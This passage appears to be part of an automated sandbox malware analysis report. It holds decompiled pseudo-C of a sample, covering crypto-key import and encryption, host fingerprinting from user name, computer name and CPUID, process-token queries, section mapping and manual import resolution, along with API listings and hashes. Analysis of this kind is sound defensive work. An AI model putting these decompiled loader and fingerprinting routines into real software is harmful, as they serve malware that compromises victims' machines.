              									E02CE61DA(_v20);
              								} else {
              									goto L17;
              								}
              							}
              						}
              						L21:
              						CryptDestroyKey(_v12);
              					}
              					CryptReleaseContext(_v24, 0);
              				}
              				return _a8;
              			}






























              0x02ce1511
              0x02ce1517
              0x02ce151a
              0x02ce1520
              0x02ce1520
              0x02ce1522
              0x02ce1524
              0x02ce1527
              0x02ce152d
              0x02ce152e
              0x02ce152f
              0x02ce1535
              0x02ce153a
              0x02ce1540
              0x02ce1548
              0x02ce16a5
              0x02ce154e
              0x02ce1550
              0x02ce1559
              0x02ce155e
              0x02ce1570
              0x02ce1573
              0x02ce1577
              0x02ce157e
              0x02ce1582
              0x02ce158a
              0x02ce1690
              0x02ce1590
              0x02ce1590
              0x02ce1594
              0x02ce1595
              0x02ce1597
              0x02ce15a2
              0x02ce167c
              0x02ce15a8
              0x02ce15a8
              0x02ce15ab
              0x02ce15b1
              0x02ce15b7
              0x02ce15b7
              0x02ce15bf
              0x02ce15c1
              0x02ce15c6
              0x02ce166d
              0x02ce15cc
              0x02ce15d2
              0x02ce15d5
              0x02ce15d8
              0x02ce15da
              0x02ce15db
              0x02ce15e0
              0x02ce15e2
              0x02ce15e2
              0x02ce15ec
              0x02ce15f1
              0x02ce15f4
              0x02ce15f7
              0x02ce15f9
              0x02ce1602
              0x02ce162c
              0x02ce1604
              0x02ce1615
              0x02ce1615
              0x02ce1634
              0x00000000
              0x00000000
              0x02ce1636
              0x02ce1639
              0x02ce163c
              0x02ce1640
              0x00000000
              0x02ce1642
              0x02ce1651
              0x02ce1657
              0x02ce165f
              0x02ce165f
              0x00000000
              0x02ce1640
              0x02ce1644
              0x02ce164a
              0x02ce164f
              0x02ce1666
              0x00000000
              0x00000000
              0x00000000
              0x02ce164f
              0x02ce15c6
              0x02ce167f
              0x02ce1682
              0x02ce1682
              0x02ce1697
              0x02ce1697
              0x02ce16af

              APIs
              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02CE5088,00000001,02CE3ECE,00000000), ref: 02CE1540
              • memcpy.NTDLL(02CE5088,02CE3ECE,00000010,?,?,?,02CE5088,00000001,02CE3ECE,00000000,?,02CE66D9,00000000,02CE3ECE,?,775EC740), ref: 02CE1559
              • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02CE1582
              • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 02CE159A
              • memcpy.NTDLL(00000000,775EC740,05259600,00000010), ref: 02CE15EC
              • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05259600,00000020,?,?,00000010), ref: 02CE1615
              • GetLastError.KERNEL32(?,?,00000010), ref: 02CE1644
              • GetLastError.KERNEL32 ref: 02CE1676
              • CryptDestroyKey.ADVAPI32(00000000), ref: 02CE1682
              • GetLastError.KERNEL32 ref: 02CE168A
              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02CE1697
              • GetLastError.KERNEL32(?,?,?,02CE5088,00000001,02CE3ECE,00000000,?,02CE66D9,00000000,02CE3ECE,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE169F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
              • String ID: @MqtNqt
              • API String ID: 3401600162-2883916605
              • Opcode ID: 7c467dba3a10a35e98c3e7c23c0b765c81af9734cc0f8c8c20e8752c27a74b07
              • Instruction ID: 3c1e8d8a6491a18aa2f7c489cab1776c9ab051f42af83b247ef48b9876c8c73e
              • Opcode Fuzzy Hash: 7c467dba3a10a35e98c3e7c23c0b765c81af9734cc0f8c8c20e8752c27a74b07
              • Instruction Fuzzy Hash: 91513AB1900208FFDF10DFA5DC84AAE7BB9FB48354F088529F91AE6140D7B08E64DB61
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 235 2ce3bd3-2ce3be7 236 2ce3be9-2ce3bee 235->236 237 2ce3bf1-2ce3c03 call 2ce71cd 235->237 236->237 240 2ce3c57-2ce3c64 237->240 241 2ce3c05-2ce3c15 GetUserNameW 237->241 242 2ce3c66-2ce3c7d GetComputerNameW 240->242 241->242 243 2ce3c17-2ce3c27 RtlAllocateHeap 241->243 244 2ce3c7f-2ce3c90 RtlAllocateHeap 242->244 245 2ce3cbb-2ce3cdf 242->245 243->242 246 2ce3c29-2ce3c36 GetUserNameW 243->246 244->245 247 2ce3c92-2ce3c9b GetComputerNameW 244->247 248 2ce3c38-2ce3c44 call 2ce56b9 246->248 249 2ce3c46-2ce3c55 246->249 250 2ce3cac-2ce3caf 247->250 251 2ce3c9d-2ce3ca9 call 2ce56b9 247->251 248->249 249->242 250->245 251->250
              C-Code - Quality: 96%
              			E02CE3BD3(char __eax, void* __esi) {
              				long _v8;
              				char _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v28;
              				long _t34;
              				signed int _t39;
              				long _t50;
              				char _t59;
              				intOrPtr _t61;
              				void* _t62;
              				void* _t64;
              				char _t65;
              				intOrPtr* _t67;
              				void* _t68;
              				void* _t69;
              
              				_t69 = __esi;
              				_t65 = __eax;
              				_v8 = 0;
              				_v12 = __eax;
              				if(__eax == 0) {
              					_t59 =  *0x2cea310; // 0xd448b889
              					_v12 = _t59;
              				}
              				_t64 = _t69;
              				E02CE71CD( &_v12, _t64);
              				if(_t65 != 0) {
              					 *_t69 =  *_t69 ^  *0x2cea344 ^ 0x6c7261ae;
              				} else {
              					GetUserNameW(0,  &_v8); // executed
              					_t50 = _v8;
              					if(_t50 != 0) {
              						_t62 = RtlAllocateHeap( *0x2cea2d8, 0, _t50 + _t50);
              						if(_t62 != 0) {
              							if(GetUserNameW(_t62,  &_v8) != 0) {
              								_t64 = _t62;
              								 *_t69 =  *_t69 ^ E02CE56B9(_v8 + _v8, _t64);
              							}
              							HeapFree( *0x2cea2d8, 0, _t62);
              						}
              					}
              				}
              				_t61 = __imp__;
              				_v8 = _v8 & 0x00000000;
              				GetComputerNameW(0,  &_v8);
              				_t34 = _v8;
              				if(_t34 != 0) {
              					_t68 = RtlAllocateHeap( *0x2cea2d8, 0, _t34 + _t34);
              					if(_t68 != 0) {
              						if(GetComputerNameW(_t68,  &_v8) != 0) {
              							_t64 = _t68;
              							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02CE56B9(_v8 + _v8, _t64);
              						}
              						HeapFree( *0x2cea2d8, 0, _t68);
              					}
              				}
              				asm("cpuid");
              				_t67 =  &_v28;
              				 *_t67 = 1;
              				 *((intOrPtr*)(_t67 + 4)) = _t61;
              				 *((intOrPtr*)(_t67 + 8)) = 0;
              				 *(_t67 + 0xc) = _t64;
              				_t39 = _v16 ^ _v20 ^ _v28;
              				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
              				return _t39;
              			}



















              0x02ce3bd3
              0x02ce3bdb
              0x02ce3bdf
              0x02ce3be2
              0x02ce3be7
              0x02ce3be9
              0x02ce3bee
              0x02ce3bee
              0x02ce3bf4
              0x02ce3bf6
              0x02ce3c03
              0x02ce3c64
              0x02ce3c05
              0x02ce3c0a
              0x02ce3c10
              0x02ce3c15
              0x02ce3c23
              0x02ce3c27
              0x02ce3c36
              0x02ce3c3d
              0x02ce3c44
              0x02ce3c44
              0x02ce3c4f
              0x02ce3c4f
              0x02ce3c27
              0x02ce3c15
              0x02ce3c66
              0x02ce3c6c
              0x02ce3c76
              0x02ce3c78
              0x02ce3c7d
              0x02ce3c8c
              0x02ce3c90
              0x02ce3c9b
              0x02ce3ca2
              0x02ce3ca9
              0x02ce3ca9
              0x02ce3cb5
              0x02ce3cb5
              0x02ce3c90
              0x02ce3cc0
              0x02ce3cc2
              0x02ce3cc5
              0x02ce3cc7
              0x02ce3cca
              0x02ce3ccd
              0x02ce3cd7
              0x02ce3cdb
              0x02ce3cdf

              APIs
              • GetUserNameW.ADVAPI32(00000000,?), ref: 02CE3C0A
              • RtlAllocateHeap.NTDLL(00000000,?), ref: 02CE3C21
              • GetUserNameW.ADVAPI32(00000000,?), ref: 02CE3C2E
              • HeapFree.KERNEL32(00000000,00000000), ref: 02CE3C4F
              • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02CE3C76
              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02CE3C8A
              • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02CE3C97
              • HeapFree.KERNEL32(00000000,00000000), ref: 02CE3CB5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: HeapName$AllocateComputerFreeUser
              • String ID: Uqt
              • API String ID: 3239747167-2320327147
              • Opcode ID: 02fe482113eae5505e9db694ba498544e697f29fe8c2831e59ae2965eb5a0ae6
              • Instruction ID: 71ee12e9c6568a3022899066ef511074684ca66191cd7bf8dc45dea453b36573
              • Opcode Fuzzy Hash: 02fe482113eae5505e9db694ba498544e697f29fe8c2831e59ae2965eb5a0ae6
              • Instruction Fuzzy Hash: 19312DB2A00605EFDF10DFA9DD81B6EB7F9FB88700F614A69E506D7210D730EA519B50
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 284 4015b0-401607 GetSystemTimeAsFileTime 287 401609 284->287 288 40160e-401627 CreateFileMappingW 284->288 287->288 289 401671-401677 GetLastError 288->289 290 401629-401632 288->290 293 401679-40167f 289->293 291 401642-401650 MapViewOfFile 290->291 292 401634-40163b GetLastError 290->292 295 401660-401666 GetLastError 291->295 296 401652-40165e 291->296 292->291 294 40163d-401640 292->294 297 401668-40166f CloseHandle 294->297 295->293 295->297 296->293 297->293
              C-Code - Quality: 69%
              			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
              				intOrPtr _v12;
              				struct _FILETIME* _v16;
              				short _v60;
              				struct _FILETIME* _t14;
              				intOrPtr _t15;
              				long _t18;
              				void* _t19;
              				void* _t22;
              				intOrPtr _t31;
              				long _t32;
              				void* _t34;
              
              				_t31 = __edx;
              				_t14 =  &_v16;
              				GetSystemTimeAsFileTime(_t14);
              				_push(0x192);
              				_push(0x54d38000);
              				_push(_v12);
              				_push(_v16);
              				L00402026();
              				_push(_t14);
              				_v16 = _t14;
              				_t15 =  *0x404184;
              				_push(_t15 + 0x4051ca);
              				_push(_t15 + 0x4051c0);
              				_push(0x16);
              				_push( &_v60);
              				_v12 = _t31;
              				L00402020();
              				_t18 = _a4;
              				if(_t18 == 0) {
              					_t18 = 0x1000;
              				}
              				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
              				_t34 = _t19;
              				if(_t34 == 0) {
              					_t32 = GetLastError();
              				} else {
              					if(_a4 != 0 || GetLastError() == 0xb7) {
              						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
              						if(_t22 == 0) {
              							_t32 = GetLastError();
              							if(_t32 != 0) {
              								goto L9;
              							}
              						} else {
              							 *_a8 = _t34;
              							 *_a12 = _t22;
              							_t32 = 0;
              						}
              					} else {
              						_t32 = 2;
              						L9:
              						CloseHandle(_t34);
              					}
              				}
              				return _t32;
              			}














              0x004015b0
              0x004015b9
              0x004015bd
              0x004015c3
              0x004015c8
              0x004015cd
              0x004015d0
              0x004015d3
              0x004015d8
              0x004015d9
              0x004015dc
              0x004015e7
              0x004015ee
              0x004015f2
              0x004015f4
              0x004015f5
              0x004015f8
              0x004015fd
              0x00401607
              0x00401609
              0x00401609
              0x0040161d
              0x00401623
              0x00401627
              0x00401677
              0x00401629
              0x00401632
              0x00401648
              0x00401650
              0x00401662
              0x00401666
              0x00000000
              0x00000000
              0x00401652
              0x00401655
              0x0040165a
              0x0040165c
              0x0040165c
              0x0040163d
              0x0040163f
              0x00401668
              0x00401669
              0x00401669
              0x00401632
              0x0040167f

              APIs
              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
              • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
              • String ID:
              • API String ID: 3812556954-0
              • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
              • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
              • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
              • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 38%
              			E02CE421F(char _a4, void* _a8) {
              				void* _v8;
              				void* _v12;
              				char _v16;
              				void* _v20;
              				char _v24;
              				char _v28;
              				char _v32;
              				char _v36;
              				char _v40;
              				void* _v44;
              				void** _t33;
              				void* _t40;
              				void* _t43;
              				void** _t44;
              				intOrPtr* _t47;
              				char _t48;
              
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				_v20 = _a4;
              				_t48 = 0;
              				_v16 = 0;
              				_a4 = 0;
              				_v44 = 0x18;
              				_v40 = 0;
              				_v32 = 0;
              				_v36 = 0;
              				_v28 = 0;
              				_v24 = 0;
              				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
              					_t33 =  &_v8;
              					__imp__(_v12, 8, _t33);
              					if(_t33 >= 0) {
              						_t47 = __imp__;
              						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
              						_t44 = E02CE33DC(_a4);
              						if(_t44 != 0) {
              							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
              							if(_t40 >= 0) {
              								memcpy(_a8,  *_t44, 0x1c);
              								_t48 = 1;
              							}
              							E02CE61DA(_t44);
              						}
              						NtClose(_v8); // executed
              					}
              					NtClose(_v12);
              				}
              				return _t48;
              			}



















              0x02ce422c
              0x02ce422d
              0x02ce422e
              0x02ce422f
              0x02ce4230
              0x02ce4234
              0x02ce423b
              0x02ce424a
              0x02ce424d
              0x02ce4250
              0x02ce4257
              0x02ce425a
              0x02ce425d
              0x02ce4260
              0x02ce4263
              0x02ce426e
              0x02ce4270
              0x02ce4279
              0x02ce4281
              0x02ce4283
              0x02ce4295
              0x02ce429f
              0x02ce42a3
              0x02ce42b2
              0x02ce42b6
              0x02ce42bf
              0x02ce42c7
              0x02ce42c7
              0x02ce42c9
              0x02ce42c9
              0x02ce42d1
              0x02ce42d7
              0x02ce42db
              0x02ce42db
              0x02ce42e6

              APIs
              • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02CE4266
              • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02CE4279
              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02CE4295
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02CE42B2
              • memcpy.NTDLL(?,00000000,0000001C), ref: 02CE42BF
              • NtClose.NTDLL(?), ref: 02CE42D1
              • NtClose.NTDLL(00000000), ref: 02CE42DB
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
              • String ID:
              • API String ID: 2575439697-0
              • Opcode ID: 44dfa5be9056be02678b713146b4da6ff5ecc5d465e49ae9f9f15aae6563f958
              • Instruction ID: 00978b6cb5d1a67208c751bb7d34240c58e9907cc3a0564550da7413fbd27f57
              • Opcode Fuzzy Hash: 44dfa5be9056be02678b713146b4da6ff5ecc5d465e49ae9f9f15aae6563f958
              • Instruction Fuzzy Hash: E32103B2A00228FBDF119FA5CC85ADEBFBDEB08750F104122F906EA110D7719B549BE0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 72%
              			E0040110B(intOrPtr* __eax, void** _a4) {
              				int _v12;
              				void* _v16;
              				void* _v20;
              				void* _v24;
              				int _v28;
              				int _v32;
              				intOrPtr _v36;
              				int _v40;
              				int _v44;
              				void* _v48;
              				void* __esi;
              				long _t34;
              				void* _t39;
              				void* _t47;
              				intOrPtr* _t48;
              
              				_t48 = __eax;
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				_v24 =  *((intOrPtr*)(__eax + 4));
              				_v16 = 0;
              				_v12 = 0;
              				_v48 = 0x18;
              				_v44 = 0;
              				_v36 = 0x40;
              				_v40 = 0;
              				_v32 = 0;
              				_v28 = 0;
              				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
              				if(_t34 < 0) {
              					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
              				} else {
              					 *_t48 = _v16;
              					_t39 = E00401459(_t48,  &_v12); // executed
              					_t47 = _t39;
              					if(_t47 != 0) {
              						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
              					} else {
              						memset(_v12, 0, _v24);
              						 *_a4 = _v12;
              					}
              				}
              				return _t47;
              			}


















              0x00401114
              0x0040111b
              0x0040111c
              0x0040111d
              0x0040111e
              0x0040111f
              0x00401130
              0x00401134
              0x00401148
              0x0040114b
              0x0040114e
              0x00401155
              0x00401158
              0x0040115f
              0x00401162
              0x00401165
              0x00401168
              0x0040116d
              0x004011a8
              0x0040116f
              0x00401172
              0x00401178
              0x0040117d
              0x00401181
              0x0040119f
              0x00401183
              0x0040118a
              0x00401198
              0x00401198
              0x00401181
              0x004011b0

              APIs
              • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401168
                • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
              • memset.NTDLL ref: 0040118A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: Section$CreateViewmemset
              • String ID: @
              • API String ID: 2533685722-2766056989
              • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
              • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
              • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
              • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00401000(void* __edi, intOrPtr _a4) {
              				signed int _v8;
              				intOrPtr* _v12;
              				_Unknown_base(*)()** _v16;
              				signed int _v20;
              				signed short _v24;
              				struct HINSTANCE__* _v28;
              				intOrPtr _t43;
              				intOrPtr* _t45;
              				intOrPtr _t46;
              				struct HINSTANCE__* _t47;
              				intOrPtr* _t49;
              				intOrPtr _t50;
              				signed short _t51;
              				_Unknown_base(*)()* _t53;
              				CHAR* _t54;
              				_Unknown_base(*)()* _t55;
              				void* _t58;
              				signed int _t59;
              				_Unknown_base(*)()* _t60;
              				intOrPtr _t61;
              				intOrPtr _t65;
              				signed int _t68;
              				void* _t69;
              				CHAR* _t71;
              				signed short* _t73;
              
              				_t69 = __edi;
              				_v20 = _v20 & 0x00000000;
              				_t59 =  *0x404180;
              				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
              				if(_t43 != 0) {
              					_t45 = _t43 + __edi;
              					_v12 = _t45;
              					_t46 =  *((intOrPtr*)(_t45 + 0xc));
              					if(_t46 != 0) {
              						while(1) {
              							_t71 = _t46 + _t69;
              							_t47 = LoadLibraryA(_t71); // executed
              							_v28 = _t47;
              							if(_t47 == 0) {
              								break;
              							}
              							_v24 = _v24 & 0x00000000;
              							 *_t71 = _t59 - 0x43175ac3;
              							_t49 = _v12;
              							_t61 =  *((intOrPtr*)(_t49 + 0x10));
              							_t50 =  *_t49;
              							if(_t50 != 0) {
              								L6:
              								_t73 = _t50 + _t69;
              								_v16 = _t61 + _t69;
              								while(1) {
              									_t51 =  *_t73;
              									if(_t51 == 0) {
              										break;
              									}
              									if(__eflags < 0) {
              										__eflags = _t51 - _t69;
              										if(_t51 < _t69) {
              											L12:
              											_t21 =  &_v8;
              											 *_t21 = _v8 & 0x00000000;
              											__eflags =  *_t21;
              											_v24 =  *_t73 & 0x0000ffff;
              										} else {
              											_t65 = _a4;
              											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
              											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
              												goto L12;
              											} else {
              												goto L11;
              											}
              										}
              									} else {
              										_t51 = _t51 + _t69;
              										L11:
              										_v8 = _t51;
              									}
              									_t53 = _v8;
              									__eflags = _t53;
              									if(_t53 == 0) {
              										_t54 = _v24 & 0x0000ffff;
              									} else {
              										_t54 = _t53 + 2;
              									}
              									_t55 = GetProcAddress(_v28, _t54);
              									__eflags = _t55;
              									if(__eflags == 0) {
              										_v20 = _t59 - 0x43175a44;
              									} else {
              										_t68 = _v8;
              										__eflags = _t68;
              										if(_t68 != 0) {
              											 *_t68 = _t59 - 0x43175ac3;
              										}
              										 *_v16 = _t55;
              										_t58 = _t59 * 4 - 0xc5d6b08;
              										_t73 = _t73 + _t58;
              										_t32 =  &_v16;
              										 *_t32 = _v16 + _t58;
              										__eflags =  *_t32;
              										continue;
              									}
              									goto L23;
              								}
              							} else {
              								_t50 = _t61;
              								if(_t61 != 0) {
              									goto L6;
              								}
              							}
              							L23:
              							_v12 = _v12 + 0x14;
              							_t46 =  *((intOrPtr*)(_v12 + 0xc));
              							if(_t46 != 0) {
              								continue;
              							} else {
              							}
              							L26:
              							goto L27;
              						}
              						_t60 = _t59 + 0xbce8a5bb;
              						__eflags = _t60;
              						_v20 = _t60;
              						goto L26;
              					}
              				}
              				L27:
              				return _v20;
              			}




























              0x00401000
              0x00401009
              0x0040100e
              0x00401014
              0x0040101d
              0x00401023
              0x00401025
              0x00401028
              0x0040102d
              0x00401034
              0x00401034
              0x00401038
              0x0040103e
              0x00401043
              0x00000000
              0x00000000
              0x00401049
              0x00401053
              0x00401055
              0x00401058
              0x0040105b
              0x0040105f
              0x00401067
              0x00401069
              0x0040106c
              0x004010d4
              0x004010d4
              0x004010d8
              0x00000000
              0x00000000
              0x00401071
              0x00401077
              0x00401079
              0x0040108c
              0x0040108f
              0x0040108f
              0x0040108f
              0x00401093
              0x0040107b
              0x0040107b
              0x00401083
              0x00401085
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00401085
              0x00401073
              0x00401073
              0x00401087
              0x00401087
              0x00401087
              0x00401096
              0x00401099
              0x0040109b
              0x004010a2
              0x0040109d
              0x0040109d
              0x0040109d
              0x004010aa
              0x004010b0
              0x004010b2
              0x004010e2
              0x004010b4
              0x004010b4
              0x004010b7
              0x004010b9
              0x004010c1
              0x004010c1
              0x004010c6
              0x004010c8
              0x004010cf
              0x004010d1
              0x004010d1
              0x004010d1
              0x00000000
              0x004010d1
              0x00000000
              0x004010b2
              0x00401061
              0x00401061
              0x00401065
              0x00000000
              0x00000000
              0x00401065
              0x004010e5
              0x004010e5
              0x004010ec
              0x004010f1
              0x00000000
              0x00000000
              0x004010f7
              0x00401102
              0x00000000
              0x00401102
              0x004010f9
              0x004010f9
              0x004010ff
              0x00000000
              0x004010ff
              0x0040102d
              0x00401103
              0x00401108

              APIs
              • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
              • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID:
              • API String ID: 2574300362-0
              • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
              • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
              • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
              • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E00401459(void** __esi, PVOID* _a4) {
              				long _v8;
              				void* _v12;
              				void* _v16;
              				long _t13;
              
              				_v16 = 0;
              				asm("stosd");
              				_v8 = 0;
              				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
              				if(_t13 < 0) {
              					_push(_t13);
              					return __esi[6]();
              				}
              				return 0;
              			}







              0x0040146b
              0x00401471
              0x0040147f
              0x00401486
              0x0040148b
              0x00401491
              0x00000000
              0x00401492
              0x00000000

              APIs
              • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
